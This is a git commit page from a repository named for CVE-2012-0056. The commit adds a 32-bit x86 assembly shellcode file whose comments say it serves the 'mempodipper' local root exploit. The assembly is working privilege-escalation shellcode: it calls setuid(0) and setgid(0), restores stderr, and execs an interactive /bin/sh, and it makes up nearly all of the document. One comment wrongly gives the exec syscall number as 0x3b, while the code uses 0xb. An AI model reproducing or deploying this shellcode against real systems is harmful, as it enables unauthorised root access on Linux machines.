diff options
author | Jason A. Donenfeld <Jason@zx2c4.com> | 2012-01-22 06:16:39 +0100 |
---|---|---|
committer | Jason A. Donenfeld <Jason@zx2c4.com> | 2012-01-22 06:16:39 +0100 |
commit | 14b33f1b7c5c761cc089dede4fa6aeb187ff66ac (patch) | |
tree | df5f2aed70c872d7bc3059e2dc6de6c78fb17f90 /shellcode-32.s | |
parent | Add custom 64bit shellcode and preserve stderr. (diff) | |
download | CVE-2012-0056-14b33f1b7c5c761cc089dede4fa6aeb187ff66ac.tar.xz CVE-2012-0056-14b33f1b7c5c761cc089dede4fa6aeb187ff66ac.zip |
Add 32bit shellcode.
Diffstat (limited to 'shellcode-32.s')
-rw-r--r-- | shellcode-32.s | 53 |
1 files changed, 53 insertions, 0 deletions
diff --git a/shellcode-32.s b/shellcode-32.s new file mode 100644 index 0000000..d08b93f --- /dev/null +++ b/shellcode-32.s @@ -0,0 +1,53 @@ +BITS 32 +; This shell code sets uid and gid to 0 and execs a shell in interactive mode. +; It also reopens stderr that was previously saved inside fd 6, for use with mempodipper. +; +; by zx2c4 + + +;setuid(0) +xor ebx,ebx +mov al,0x17 +int 0x80 +;setgid(0) +xor ebx,ebx +mov al,0x2e +int 0x80 +;dup2(6, 2) +mov bl,0x6 +mov cl,0x2 +mov al,0x3f +int 0x80 + + + +; execve("//bin/sh", ["//bin/sh", "-i", 0], 0) +xor eax,eax ; eax = 0 +push eax ; push eax +push 0x68732f6e ; push //bin/sh +push 0x69622f2f +mov ebx,esp ; set ebx (arg 1) to top of stack + +xor edx,edx ; edx = 0 +mov dx,'-i' ; edx = '-i' +push edx ; push edx to stack +mov eax,esp ; set eax to top of stack + +xor edx,edx ; edx = 0 + +; so at this point: +; ebx is a pointer to '//bin/sh' +; eax is a pointer to '-i' +; edx is null +; since they are all the same size, we'll push them on the stack +; and then it will be an array: +push edx ; push edx to stack +push eax ; push eax to stack +push ebx ; push ebx to stack +mov ecx,esp ; set ecx (arg 2) to top of stack + +xor edx,edx ; rdx (arg 3) = 0 + +xor eax,eax +mov al,0xb ; al = 0x3b, which is the exec call +int 0x80 |